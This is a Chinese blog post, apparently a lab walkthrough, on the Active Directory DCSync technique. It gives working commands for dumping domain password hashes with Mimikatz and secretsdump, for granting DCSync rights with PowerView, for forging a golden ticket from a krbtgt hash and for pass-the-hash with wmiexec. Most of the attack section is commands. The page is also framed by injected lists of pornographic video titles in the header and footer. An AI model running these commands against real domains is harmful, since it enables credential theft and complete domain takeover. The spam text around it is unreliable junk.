<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      DCSync

      DCSync概述

      DCSync是一種用于獲取用戶(hù)憑據(jù)的方法,可以用來(lái)查找DC,請(qǐng)求目錄復(fù)制,并從后續(xù)響應(yīng)中收集密碼哈希。在2015年成為Mimikatz工具的一個(gè)板塊,可以在一定條件下導(dǎo)出域內(nèi)哈希

      實(shí)驗(yàn)環(huán)境

      域名:HIRO
      域控:WIN-KONG@192.168.228.10 域管:hiro\administrator
      主機(jī):WINis07@192.168.228.15 域用戶(hù):hiro\win7

      利用條件:

      1.域控本地管理組用戶(hù)(administrators,Domain Admins,Enterprise Admins的組內(nèi)用戶(hù))
      image
      2.域控制器的計(jì)算機(jī)用戶(hù)(可能域控有CVE-2020-1472漏洞[ZeroLogon])
      3.拿下exchange服務(wù)器后可以WriteACL賦予指定用戶(hù)或域機(jī)器DCSync權(quán)限

      利用方式:

      1.擁有上述條件的任意用戶(hù)權(quán)限,即可導(dǎo)出域內(nèi)任意用戶(hù)的hash

      導(dǎo)出administrator用戶(hù)的Hash
      privilege::debug
      lsadump::dcsync /domain:hiro.com /user:administrator
      image

      導(dǎo)出所有用戶(hù)的哈希
      privilege::debug
      lsadump::dcsync /domain:hiro.com /all /csv
      image

      2.使用Empire下的powerview.ps1腳本執(zhí)行以上三條ACE

      DCsync是幾個(gè)權(quán)限的集合體,如果使其具有DCSync權(quán)限的話(huà),可以向域內(nèi)普通用戶(hù)添加如下三條ACE(Access Control Entries):
      DS-Replication-Get-Changes-->(GUID:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)
      DS-Replication-Get-Changes-All-->(GUID:1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)
      DS-Replication-Get-Changes-->(GUID:89e95b76-444d-4c62-991a-0facbeda640c)

      在域管用戶(hù)上給域用戶(hù)win7添加以上三條ACE
      Add-DomainObjectAcl -TargetIdentity "DC=hiro,DC=com" -PrincipalIdentity win7 -Rights DCSync -Verbose
      image

      當(dāng)用戶(hù)win7具有DCSync權(quán)限后,可以導(dǎo)出域內(nèi)哈希:
      python3 secretsdump.py hiro.com/win7:123456QWE.@192.168.228.10 -dc-ip 192.168.228.10
      image

      給域用戶(hù)win7刪除以上三條ACE
      Remove-DomainObjectAcl -TargetIdentity "DC=hiro,DC=com" -PrincipalIdentity win7 -Rights DCSync -Verbose
      image

      域用戶(hù)win7失去了DCSync權(quán)限,同時(shí)也無(wú)法導(dǎo)出域內(nèi)hash了
      image

      3.使用黃金票據(jù)+DCSync導(dǎo)出域內(nèi)所有用戶(hù)的Hash:

      生成黃金票據(jù):
      privilege::debug
      得到krbtgt用戶(hù)hash
      lsadump::dcsync /domain:hiro.com /user:krbtgt
      導(dǎo)入黃金票據(jù),其中sid為域的sid
      kerberos::golden /user:administrator /domain:hiro.com /sid:S-1-5-21-1909134247-741334235-3019370817 /krbtgt:5f468f6d7ac43c327396d832a0241d81 /ptt
      image

      image

      導(dǎo)出域hash:
      privilege::debug
      kerberos::list
      導(dǎo)出所有用戶(hù)的哈希
      lsadump::dcsync /domain:hiro.com /all /csv
      image

      image

      哈希傳遞

      python3 .\wmiexec.py hiro/administrator@192.168.228.10 -hashes aad3b435b51404eeaad3b435b51404ee:e9bf196dc93a1219e3b2e79b1b7aa36e
      image

      posted @ 2021-05-27 03:22  cAr7n  閱讀(781)  評(píng)論(0)    收藏  舉報(bào)
      主站蜘蛛池模板: 国产做a爱片久久毛片a片| 色欲国产精品一区成人精品| 欧美丰满熟妇性xxxx| 护士张开腿被奷日出白浆| 中文字幕在线亚洲精品| 人妻一区二区三区三区| 国产熟女一区二区三区四区 | 国产欧美久久一区二区| 日韩av无码精品人妻系列| 午夜福利偷拍国语对白| 思思热在线视频精品| 日韩 欧美 亚洲 一区二区| 亚洲第一区二区快射影院| 亚洲国产成人午夜在线一区| 四虎库影成人在线播放| 亚洲午夜香蕉久久精品| 国产激情第一区二区三区| 麻豆人人妻人人妻人人片av| 国产成人综合色在线观看网站| 少妇粗大进出白浆嘿嘿视频 | 一本av高清一区二区三区| 洛扎县| 国产亚洲精品自在久久vr| 国产一区二区在线观看粉嫩| 精品人妻无码一区二区三区性| 亚洲国产精品一区在线看| 亚洲国产欧美一区二区好看电影 | 性按摩玩人妻hd中文字幕| 麻豆蜜桃av蜜臀av色欲av| 亚洲爆乳WWW无码专区| 看免费真人视频网站| 免费午夜无码片在线观看影院| 国产成人av一区二区三| 久久中文字幕无码一区二区| 91一区二区三区蜜桃臀| 中文人妻AV高清一区二区| 欧美亚洲另类制服卡通动漫| 中文字幕国产精品第一页| 色偷偷亚洲女人天堂观看| 久久66热人妻偷产精品| 国产成人亚洲欧美二区综合|